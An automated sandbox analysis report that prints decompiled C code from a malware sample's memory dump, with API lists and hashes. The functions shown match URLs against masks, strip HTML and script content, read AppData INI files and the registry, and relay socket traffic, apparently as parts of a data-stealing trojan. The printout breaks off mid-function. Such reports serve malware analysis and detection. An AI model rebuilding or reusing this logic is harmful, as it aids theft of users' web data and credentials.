    				void* _t189;
    				struct _CRITICAL_SECTION* _t192;
    				void* _t195;
    				struct _CRITICAL_SECTION* _t199;
    				signed int _t200;
    				void* _t202;
    				void* _t206;
    				void* _t211;
    				void* _t212;
    				void* _t219;
    				void* _t220;
    				intOrPtr _t221;
    				char _t224;
    				void* _t225;
    				void* _t226;
    				void* _t229;
    				void* _t230;
    				void* _t232;
    				void* _t238;
    				void* _t241;
    				struct _CRITICAL_SECTION* _t242;
    				void* _t245;
    				void* _t247;
    				intOrPtr _t250;
    				char* _t251;
    				void* _t264;
    				void* _t273;
    				void* _t275;
    				void* _t277;
    				void* _t278;
    
    				_t275 = _t277 - 0x78;
    				_t278 = _t277 - 0x21c;
    				_t269 = 0x12dd074;
    				_t199 = 0;
    				_t273 = __ecx;
    				 *(_t275 + 0x70) = 0;
    				 *((char*)(_t275 + 0x77)) = 0xff;
    				EnterCriticalSection(0x12dd074);
    				_t208 =  *0x12dd090;
    				if( *0x12dd090 != 0 &&  *0x12dd08c != 0) {
    					_t266 =  *(_t273 + 8);
    					if(L012B1622(_t208,  *(_t273 + 8),  *(_t273 + 0xc), 0) != 0) {
    						_t192 = L012B1816(_t191, _t266, _t273);
    						 *(_t275 + 0x6c) = _t192;
    						if(_t192 != 0) {
    							_push( *0x12dd08c);
    							_t267 = _t275 + 0x6c;
    							_t241 = 4;
    							_t195 = L012B14A6(_t241, _t275 + 0x6c);
    							_t242 =  *(_t275 + 0x6c);
    							if(_t195 == 0) {
    								L012B1933(_t242);
    								_t242 = 0;
    							}
    							L012B1A32(_t242, _t267);
    						}
    						L012B1933( *0x12dd08c);
    						L012B1933( *0x12dd090);
    						 *0x12dd08c = _t199;
    						 *0x12dd090 = _t199;
    					}
    				}
    				LeaveCriticalSection(_t269);
    				_t209 =  *((intOrPtr*)(_t273 + 0x40));
    				_t287 =  *((intOrPtr*)(_t273 + 0x40)) - _t199;
    				if( *((intOrPtr*)(_t273 + 0x40)) == _t199) {
    					L36:
    					if(( *(_t275 + 0x70) & 0x00000001) == 0) {
    						_t258 =  *((intOrPtr*)(_t273 + 0x44));
    						if( *((intOrPtr*)(_t273 + 0x44)) != _t199) {
    							_push(_t199);
    							_push( *(_t273 + 0xc));
    							_push( *(_t273 + 8));
    							_t232 = 3;
    							if(L012B1997(_t232, _t258, _t273) != 0) {
    								 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000001;
    							}
    						}
    					}
    					if( *(_t273 + 0x20) >= 0x21) {
    						_t230 = 0x11;
    						L012B165E(_t230, _t275 + 0x28);
    						if(L012B1735( *((intOrPtr*)(_t273 + 0x1c)), _t275 + 0x28, 0x21) == 0) {
    							_t171 =  *((intOrPtr*)( *((intOrPtr*)(_t273 + 0x1c)) + 0x21));
    							if(_t171 == 0x3b || _t171 == 0) {
    								 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000010;
    							}
    						}
    					}
    					_t129 =  *((intOrPtr*)(_t273 + 0x2c));
    					 *(_t275 + 0x68) = _t199;
    					if(_t129 == _t199 ||  *_t129 == _t199) {
    						L50:
    						_t130 =  *((intOrPtr*)(_t273 + 0x34));
    						__eflags = _t130 - _t199;
    						if(_t130 == _t199) {
    							goto L57;
    						}
    						__eflags =  *_t130;
    						if( *_t130 == 0) {
    							goto L57;
    						}
    						_t226 = 0x13;
    						L012B1479(_t226, _t275 - 0x38);
    						_t161 = L012B151E(_t275 + 0x68, _t275 - 0x38,  *((intOrPtr*)(_t273 + 0x34)));
    						_t278 = _t278 + 0xc;
    						goto L53;
    					} else {
    						_t164 =  *((intOrPtr*)(_t273 + 0x30));
    						if(_t164 == _t199 ||  *_t164 == _t199) {
    							goto L50;
    						} else {
    							_t229 = 0x12;
    							L012B1479(_t229, _t275 - 0xa0);
    							_push( *((intOrPtr*)(_t273 + 0x30)));
    							_t161 = L012B151E(_t275 + 0x68, _t275 - 0xa0,  *((intOrPtr*)(_t273 + 0x2c)));
    							_t278 = _t278 + 0x10;
    							L53:
    							if(_t161 > _t199) {
    								_t162 = L012B1523(_t161,  *(_t275 + 0x68), _t161 + _t161, _t273);
    								if( *0x12dd094 != _t162) {
    									_t64 = _t275 + 0x70;
    									 *_t64 =  *(_t275 + 0x70) | 0x00000020;
    									__eflags =  *_t64;
    									 *0x12dd094 = _t162;
    								} else {
    									L012B1933( *(_t275 + 0x68));
    									 *(_t275 + 0x68) = _t199;
    								}
    							}
    							L57:
    							if( *((char*)(_t275 + 0x77)) != 0xff) {
    								__eflags =  *((char*)(_t275 + 0x77)) - 1;
    								if( *((char*)(_t275 + 0x77)) != 1) {
    									L64:
    									if(( *(_t275 + 0x70) & 0x00000008) == 0) {
    										L94:
    										L012B1933( *(_t275 + 0x68));
    										_t200 =  *(_t275 + 0x70);
    										if((_t200 & 0x00000001) == 0) {
    											if(E012C532C(_t200, _t269, _t273) != 0) {
    												_t200 = _t200 | 0x00000002;
    											}
    											if((_t200 & 0x00000010) != 0 && E012C4930(_t273) != 0) {
    												_t200 = _t200 | 0x00000004;
    											}
    										}
    										return _t200;
    									}
    									_t243 =  *(_t273 + 0x28);
    									_t202 = 0;
    									if( *(_t273 + 0x28) != 0) {
    										__eflags =  *(_t275 + 0x70) & 0x00000010;
    										if(( *(_t275 + 0x70) & 0x00000010) == 0) {
    											__eflags =  *(_t273 + 0x20);
    											if( *(_t273 + 0x20) != 0) {
    												L93:
    												 *(_t275 + 0x70) =  *(_t275 + 0x70) & 0xfffffff7;
    												goto L94;
    											}
    											_t211 = 0xd;
    											L012B165E(_t211, _t275 + 0x4c);
    											_push(9);
    											_t212 = _t275 + 0x4c;
    											L78:
    											_pop(_t245);
    											 *(_t275 + 0x6c) = L012B12A8(_t212, _t245);
    											L79:
    											if( *(_t275 + 0x6c) == 0) {
    												goto L93;
    											}
    											E012B1A50(_t275 + 0x64);
    											_t138 = L012B1596( *(_t273 + 8),  *(_t273 + 0xc));
    											_t269 = _t138;
    											if(_t138 != 0) {
    												_t247 = 0x3c;
    												L012B19F6(_t275 - 0x30, _t247);
    												 *(_t275 - 0x30) = 0x3c;
    												if(InternetCrackUrlA( *(_t273 + 8),  *(_t273 + 0xc), 0, _t275 - 0x30) == 1) {
    													_t219 = 0xb;
    													L012B1479(_t219, _t275 - 0x9c);
    													_t220 = 0xe;
    													L012B1479(_t220, _t275 + 0x34);
    													_t147 =  *(_t275 + 0x68);
    													 *(_t275 + 0x60) = 0x12d8a44;
    													if(_t147 != 0) {
    														 *(_t275 + 0x60) = _t147;
    													}
    													_t250 =  *((intOrPtr*)(_t275 + 0x64));
    													if(_t250 == 0) {
    														_t250 = 0x12d8a48;
    													}
    													_t148 =  *((intOrPtr*)(_t273 + 0x10));
    													_t221 = 0x12d8a4c;
    													if(_t148 != 0) {
    														_t221 = _t148;
    													}
    													_t149 = _t275 + 0x34;
    													if(( *(_t275 + 0x70) & 0x00000001) == 0) {
    														_t149 = 0x12d8a50;
    													}
    													_push( *(_t275 + 0x6c));
    													_push( *(_t275 + 0x60));
    													_push(_t250);
    													_push(_t221);
    													_push(_t149);
    													_t202 = L012B171C((0 |  *((intOrPtr*)(_t275 - 0x24)) == 0x00000004) + 0xb, _t269, 0, _t275 - 0x9c, _t269);
    												}
    												L012B1933(_t269);
    											}
    											L012B1933( *((intOrPtr*)(_t275 + 0x64)));
    											L012B1933( *(_t275 + 0x6c));
    											if(_t202 != 0) {
    												goto L94;
    											} else {
    												goto L93;
    											}
    										}
    										_t155 = L012B12A8( *((intOrPtr*)(_t273 + 0x24)), _t243);
    										 *(_t275 + 0x6c) = _t155;
    										__eflags = _t155;
    										if(_t155 == 0) {
    											goto L93;
    										}
    										_t156 = 0;
    										__eflags =  *(_t273 + 0x28);
    										if( *(_t273 + 0x28) <= 0) {
    											goto L79;
    										} else {
    											goto L70;
    										}
    										do {
    											L70:
    											_t251 = _t156 +  *(_t275 + 0x6c);
    											_t224 =  *_t251;
    											__eflags = _t224 - 0x26;
    											if(_t224 != 0x26) {
    												__eflags = _t224 - 0x2b;
    												if(_t224 == 0x2b) {
    													 *_t251 = 0x20;
    												}
    											} else {
    												 *_t251 = 0xa;
    											}
    											_t156 = _t156 + 1;
    											__eflags = _t156 -  *(_t273 + 0x28);
    										} while (_t156 <  *(_t273 + 0x28));
    										goto L79;
    									}
    									_t225 = 0xc;
    									L012B165E(_t225, _t275 + 0x58);
    									_push(7);
    									_t212 = _t275 + 0x58;
    									goto L78;
    								}
    								L63:
    								 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000008;
    								goto L64;
    							}
    							if( *((char*)(_t273 + 0x18)) != 1 ||  *(_t273 + 0x28) <= _t199) {
    								if(( *(_t275 + 0x70) & 0x00000020) == 0) {
    									goto L64;
    								}
    							}
    							goto L63;
    						}
    					}
    				}
    				_t269 = L012B1AAA(_t209, _t287, 0x10000000, _t275 + 0x64);
    				 *(_t275 + 0x60) = _t269;
    				if(L012B1A5A(_t269,  *((intOrPtr*)(_t275 + 0x64))) == 0) {
    					L35:
    					L012B1933( *(_t275 + 0x60));
    					_t199 = 0;
    					goto L36;
    				} else {
    					goto L10;
    				}
    				do {
    					L10:
    					if( *((char*)(_t269 + 1)) == 0) {
    						goto L34;
    					}
    					_t178 =  *_t269;
    					if(_t178 == 0x21) {
    						L20:
    						__eflags = _t269;
    						L21:
    						if(L012B1622(_t269,  *(_t273 + 8),  *(_t273 + 0xc), 0) == 0) {
    							goto L34;
    						}
    						_t181 = _t206;
    						if(_t181 == 0) {
    							 *((char*)(_t275 + 0x77)) = 0;
    							L33:
    							if(_t206 != 2) {
    								goto L35;
    							}
    							goto L34;
    						}
    						_t182 = _t181 - 1;
    						if(_t182 == 0) {
    							L28:
    							 *((char*)(_t275 + 0x77)) = 1;
    							goto L33;
    						}
    						_t183 = _t182 - 1;
    						if(_t183 == 0) {
    							_t264 = 0x3c;
    							L012B19F6(_t275 + 0x10, _t264);
    							 *((intOrPtr*)(_t275 + 0x20)) = _t275 - 0x1a4;
    							 *(_t275 + 0x10) = 0x3c;
    							 *(_t275 + 0x24) = 0x103;
    							_t187 = InternetCrackUrlA( *(_t273 + 8),  *(_t273 + 0xc), 0, _t275 + 0x10);
    							__eflags = _t187 - 1;
    							if(_t187 == 1) {
    								__eflags =  *(_t275 + 0x24);
    								if( *(_t275 + 0x24) > 0) {
    									_t238 = 0x14;
    									E012B1208(_t238, _t275 - 0x1a4);
    								}
    							}
    							goto L33;
    						}
    						_t189 = _t183 - 1;
    						if(_t189 == 0 || _t189 == 1) {
    							 *(_t275 + 0x70) =  *(_t275 + 0x70) | 0x00000001;
    							goto L28;
    						} else {
    							goto L33;
    						}
    					}
    					if(_t178 == 0x2d) {
    						goto L20;
    					}
    					if(_t178 == 0x40) {
    						goto L20;
    					}
    					if(_t178 == 0x5e) {
    						_t206 = 4;
    						goto L20;
    					} else {
    						_t206 = 0;
    						goto L21;
    					}
    					L34:
    					_t269 = L012B1717(_t269, 1);
    				} while (_t269 != 0);
    				goto L35;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(012DD074), ref: 012C5679
    • LeaveCriticalSection.KERNEL32(012DD074), ref: 012C56F4
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 012C57BD
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 012C59EA
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CrackCriticalInternetSection$EnterLeave
    • String ID:
    • API String ID: 1059969152-0
    • Opcode ID: f80556386fc87d7aab2439d5efaeec25caf1c7dc525c270d41b12572d70b5173
    • Instruction ID: e49618b7750170fa0384dd95b8283ea785bd577534578bd01b4d3305bc28dc23
    • Opcode Fuzzy Hash: f80556386fc87d7aab2439d5efaeec25caf1c7dc525c270d41b12572d70b5173
    • Instruction Fuzzy Hash: 3BD1CF30B2034A8FEB25DF28E890BEA3BA6BF45750F14471DEB5687191DB70E985CB40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E012B8F58(void* __ecx, intOrPtr __edx) {
    				signed int _v5;
    				char _v6;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _t46;
    				char _t47;
    				char* _t52;
    				char _t59;
    				void* _t67;
    				void* _t69;
    				void* _t70;
    				intOrPtr _t71;
    				void* _t73;
    
    				_t59 = 0;
    				_t71 = __edx;
    				_v20 = __edx;
    				_t70 = __ecx;
    				_v16 = 0;
    				_v6 = 0;
    				_v12 = 0;
    				if(__edx <= 0) {
    					L33:
    					return _v12 - _t59 + _t71;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					if(_v16 == 0 ||  *((char*)(_t59 + _t70)) != 0x3e) {
    						_t46 =  *((intOrPtr*)(_t59 + _t70));
    						if(_t46 != 0x3c) {
    							if(_v16 != 0 || _v6 != 0 || _t46 == 0xd || _t46 == 0xa || _t46 == 9) {
    								goto L32;
    							} else {
    								if(_t46 != 0x26 || _t71 - _t59 <= 5) {
    									L29:
    									_t47 =  *((intOrPtr*)(_t59 + _t70));
    									L30:
    									 *((char*)(_v12 + _t70)) = _t47;
    									goto L31;
    								} else {
    									_t33 = _t70 + 1; // 0x1
    									if(StrCmpNIA(_t59 + _t33, "nbsp;", 5) != 0) {
    										goto L29;
    									}
    									 *((char*)(_v12 + _t70)) = 0x20;
    									_t59 = _t59 + 5;
    									L31:
    									_v12 = _v12 + 1;
    									goto L32;
    								}
    							}
    						}
    						_v16 = _v16 + 1;
    						if(_v16 != 0) {
    							goto L32;
    						}
    						_t73 = _t71 - _t59;
    						_t15 = _t70 + 1; // 0x1
    						_t52 = _t59 + _t15;
    						if(_v6 == 0) {
    							_t67 = 6;
    							if(_t73 <= _t67 || L012B12D0("script", _t67, _t52) == 0) {
    								_v5 = 0;
    								do {
    									_t20 = (_v5 & 0x000000ff) + 0x12d7640; // 0x2020202
    									_t68 =  *_t20 & 0x000000ff;
    									if(_t73 <= ( *_t20 & 0x000000ff)) {
    										goto L17;
    									}
    									_t22 = _t70 + 1; // 0x1
    									if(L012B12D0( *((intOrPtr*)(0x12d7604 + _t53 * 4)), _t68, _t59 + _t22) != 0) {
    										_t29 = (_v5 & 0x000000ff) + "\n\n\n \n\n\n\n\n\n\n\n"; // 0x200a0a0a
    										_t47 =  *_t29;
    										goto L30;
    									}
    									L17:
    									_v5 = _v5 + 1;
    								} while (_v5 < 0xc);
    							} else {
    								_v6 = 1;
    							}
    							goto L32;
    						}
    						if(_t73 > 7 &&  *_t52 == 0x2f) {
    							_push(_t52 + 1);
    							_t69 = 6;
    							if(L012B12D0("script", _t69) != 0) {
    								_v6 = 0;
    							}
    						}
    					} else {
    						_v16 = _v16 - 1;
    					}
    					L32:
    					_t71 = _v20;
    					_t59 = _t59 + 1;
    				} while (_t59 < _t71);
    				goto L33;
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID: nbsp;$script$script
    • API String ID: 0-1953709447
    • Opcode ID: ed5b67165da5243c13a81775ce278d8e4e79ebd21b3c92015d8a58f15f1b2ef5
    • Instruction ID: 57476195c89027e27f651a9247b0451d210fe544334cec64ef5f4e114b06d453
    • Opcode Fuzzy Hash: ed5b67165da5243c13a81775ce278d8e4e79ebd21b3c92015d8a58f15f1b2ef5
    • Instruction Fuzzy Hash: 154122B0D2825A6EDF218BADC0C87FCBF719B1138CF0444E6CBA46B242D27559C5C711
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E012C64F2(void* __eflags, intOrPtr _a4, void* _a8) {
    				signed int _v5;
    				short _v20;
    				short _v40;
    				char _v60;
    				short _v84;
    				char _v112;
    				char _v144;
    				char _v664;
    				short _v1184;
    				short _v1704;
    				char _v2224;
    				long _t36;
    				long _t47;
    				void* _t58;
    				void* _t60;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				long _t80;
    				void* _t81;
    
    				_t58 = 0x2b;
    				L012B1479(_t58,  &_v144);
    				_t36 =  &_v664;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t36);
    				if(_t36 == 0) {
    					_t36 = L012B1203( &_v664,  &_v664,  &_v144);
    					if(_t36 != 0) {
    						_t60 = 0x2d;
    						L012B1479(_t60,  &_v112);
    						_t36 = L012B1203( &_v1184,  &_v664,  &_v112);
    						if(_t36 != 0) {
    							_t36 = GetFileAttributesW( &_v1184);
    							if(_t36 != 0xffffffff) {
    								_t62 = 0x2e;
    								L012B1479(_t62,  &_v60);
    								_t63 = 0x2f;
    								L012B1479(_t63,  &_v84);
    								_t64 = 0x30;
    								L012B1479(_t64,  &_v20);
    								_v5 = 0;
    								while(1) {
    									_t47 = L012B1A8C( &_v40, 0xa,  &_v60, _v5 & 0x000000ff);
    									_t81 = _t81 + 0x10;
    									if(_t47 < 1) {
    										break;
    									}
    									_t47 = GetPrivateProfileIntW( &_v40,  &_v84, 0xffffffff,  &_v1184);
    									_t80 = _t47;
    									if(_t80 == 0xffffffff) {
    										break;
    									}
    									_t47 = GetPrivateProfileStringW( &_v40,  &_v20, 0,  &_v1704, 0x104,  &_v1184);
    									if(_t47 == 0) {
    										L13:
    										_v5 = _v5 + 1;
    										if(_v5 < 0xfa) {
    											continue;
    										}
    										break;
    									}
    									L012B160E(_t47,  &_v1704);
    									if(_t80 != 1) {
    										L12:
    										_t47 = _a4();
    										if(_t47 == 0) {
    											break;
    										}
    										goto L13;
    									}
    									_t47 = L012B1203( &_v2224,  &_v664,  &_v1704);
    									if(_t47 == 0) {
    										goto L13;
    									}
    									goto L12;
    								}
    								return _t47;
    							}
    						}
    					}
    				}
    				return _t36;
    			}
























    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012C6518
    • GetFileAttributesW.KERNEL32(?,?,?), ref: 012C6571
    • GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 012C65D6
    • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 012C65FF
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: PrivateProfile$AttributesFileFolderPathString
    • String ID:
    • API String ID: 906213283-0
    • Opcode ID: 4e66641bc14526746141a52bbc0a5b9e60437c5bf2f7902653b4b170c45f62ef
    • Instruction ID: 81943a76fe8a9e91430280b106755d0328228b86aa6ee4bda47f693596f315ac
    • Opcode Fuzzy Hash: 4e66641bc14526746141a52bbc0a5b9e60437c5bf2f7902653b4b170c45f62ef
    • Instruction Fuzzy Hash: 9C41E171910219AEDF20EBA4DCC4EEEB77CAF14350F104696E355A61C4EB749B48CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CE76A(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct HWND__* _v8;
    				intOrPtr _v12;
    				struct tagRECT _v28;
    				char _v32;
    				void* __edi;
    				intOrPtr _t29;
    				signed int _t30;
    				RECT* _t50;
    				signed int _t53;
    				intOrPtr* _t61;
    
    				_t55 = __edx;
    				_t61 = __edx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				_v8 = __ecx;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) != 0) {
    					_t29 =  *((intOrPtr*)(_t61 + 0x14));
    					_t53 =  *(_t29 + 0x24);
    					if((_t53 & 0x40000000) == 0) {
    						_t50 =  *_t61 + 0x24;
    					} else {
    						_t50 = _t61 + 4;
    					}
    					if((_t53 & 0x10000000) == 0) {
    						_t30 = 0;
    						goto L9;
    					} else {
    						if((IntersectRect( &_v28, _t29 + 0x14, _t50) & 0xffffff00 | _t39 != 0x00000000) != 0) {
    							L10:
    							E012CE62B( *_t61, _t55, _t50, _v8,  *((intOrPtr*)(_t61 + 0x14)));
    							_v32 =  *_t61;
    							_v12 =  *((intOrPtr*)(_t61 + 0x14));
    							L012B124E(_v8, 0, E012CE76A,  &_v32);
    						} else {
    							if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) != 0) {
    								_t30 = IntersectRect( &_v28,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t50) & 0xffffff00 | _t47 != 0x00000000;
    								L9:
    								if(_t30 != 0) {
    									goto L10;
    								}
    							}
    						}
    					}
    				}
    				return 1;
    			}














    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Rect$Intersect$EmptyInfoWindow
    • String ID:
    • API String ID: 2228701747-0
    • Opcode ID: 1a62ec038ae39a8a177611353c95c6527107b50f2ec2607ce82778eb9e66b9b6
    • Instruction ID: 6296f0c311aad3fcd4f300d22731a9843e8e5b4e2ca8d8936d97f59badc292fe
    • Opcode Fuzzy Hash: 1a62ec038ae39a8a177611353c95c6527107b50f2ec2607ce82778eb9e66b9b6
    • Instruction Fuzzy Hash: 5C219871510205EBEB24DF68E981D9B7BFCEF04A04B060658E642D7201D635F9098B70
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 012B6B92
    • recv.WS2_32(?,?,00000400,00000000), ref: 012B6BDA
    • send.WS2_32(?,?,00000000,00000000), ref: 012B6BF4
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 012B6C34
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: ObjectSingleWaitrecvselectsend
    • String ID:
    • API String ID: 4176622587-0
    • Opcode ID: be398606af181c4c5f980415e9aa92d6f8b6388282ba22d0870a14aa00970ad7
    • Instruction ID: 33a3537b5d58a87ea09b656741b41dcbfba09de743f2827c4862fa42286f494f
    • Opcode Fuzzy Hash: be398606af181c4c5f980415e9aa92d6f8b6388282ba22d0870a14aa00970ad7
    • Instruction Fuzzy Hash: B8211571C1112DEBCB25DF99D9899EEBBB9FB05350F2084A6E605E2240D7709B81CFA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B7BC7(void* __ecx, short* __edx, short* _a4, int* _a8, char** _a12) {
    				int _v8;
    				void* _v12;
    				int _v16;
    				char* _t38;
    
    				_v16 = _v16 | 0xffffffff;
    				 *_a12 = 0;
    				_v12 = __ecx;
    				if(RegOpenKeyExW(__ecx, __edx, 0, 1,  &_v12) != 0) {
    					L10:
    					return _v16;
    				}
    				_v8 = 0;
    				if(RegQueryValueExW(_v12, _a4, 0, _a8, 0,  &_v8) == 0) {
    					_t30 = _v8;
    					if(_v8 != 0) {
    						_t38 = L012B1C17(_t30 + 4);
    						if(_t38 != 0) {
    							if(RegQueryValueExW(_v12, _a4, 0, _a8, _t38,  &_v8) != 0) {
    								L012B1933(_t38);
    							} else {
    								 *_a12 = _t38;
    								_v16 = _v8;
    							}
    						}
    					} else {
    						_v16 = 0;
    					}
    				}
    				RegCloseKey(_v12);
    				goto L10;
    			}








    APIs
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 012B7BE5
    • RegQueryValueExW.ADVAPI32(?,?,00000000,000000FF,00000000,?,?,?,?,00000000,00000001,?), ref: 012B7C08
    • RegQueryValueExW.ADVAPI32(?,?,00000000,000000FF,00000000,?,?,?,?,?,00000000,00000001,?), ref: 012B7C38
    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000001,?), ref: 012B7C56
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: QueryValue$CloseOpen
    • String ID:
    • API String ID: 1586453840-0
    • Opcode ID: 316f85d82e6430c516c7371e8f11f90aa5a1fd85badf829cdd3cca8cad3c12b8
    • Instruction ID: 22cba5eaddbeaf8175ae7496f8f8dc9a46c024c97470a5c4c5a22d78c4890879
    • Opcode Fuzzy Hash: 316f85d82e6430c516c7371e8f11f90aa5a1fd85badf829cdd3cca8cad3c12b8
    • Instruction Fuzzy Hash: FA21447191020AFFDB118F99DC85CEEBBB9FF84380F108069F915A7251E3318A508B20
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012BD270(void* __ecx, void* __edx, long _a4, DWORD* _a8, intOrPtr _a12) {
    				char _v5;
    				struct _OVERLAPPED _v28;
    				long _t17;
    				void* _t22;
    				DWORD* _t28;
    
    				_t22 = __ecx;
    				_v5 = 0;
    				L012B15F5( &_v28,  &_v28, 0, 0x14);
    				_t28 = _a8;
    				_v28.hEvent = _a12;
    				if(ReadFile(__ecx, __edx, _a4, _t28,  &_v28) == 0) {
    					_t17 = GetLastError();
    					if(_t17 == 0x26) {
    						L6:
    						 *_t28 =  *_t28 & 0x00000000;
    						goto L7;
